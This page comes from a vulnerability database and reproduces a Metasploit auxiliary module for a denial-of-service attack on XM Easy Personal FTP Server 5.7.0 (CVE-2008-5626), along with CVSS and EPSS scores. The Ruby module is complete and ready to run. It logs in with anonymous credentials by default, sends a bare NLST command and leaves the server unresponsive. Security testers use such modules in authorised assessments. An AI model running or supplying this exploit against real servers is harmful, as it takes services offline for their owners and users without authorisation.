Lucene search

K
metasploitKris katterjohn <[email protected]>MSF:AUXILIARY-DOS-WINDOWS-FTP-XMEASY570_NLST-
HistoryApr 07, 2009 - 6:26 p.m.

XM Easy Personal FTP Server 5.7.0 NLST DoS

2009-04-0718:26:19
kris katterjohn <[email protected]>
www.rapid7.com
36

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:N/I:N/A:P

EPSS

0.956

Percentile

99.5%

You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call NLST.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',
      'Description'    => %q{
        You need a valid login to DoS this FTP server, but
        even anonymous can do it as long as it has permission
        to call NLST.
      },
      'Author'         => 'kris katterjohn',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2008-5626'],
        [ 'OSVDB', '50837'],
        [ 'EDB', '8294' ]
      ],
      'DisclosureDate' => '2009-03-27')
    )

    # They're required
    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])
    ])
  end

  def run
    return unless connect_login

    raw_send("NLST\r\n")

    disconnect

    print_status("OK, server may still be technically listening, but it won't respond")
  end
end

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:N/I:N/A:P

EPSS

0.956

Percentile

99.5%

Related for MSF:AUXILIARY-DOS-WINDOWS-FTP-XMEASY570_NLST-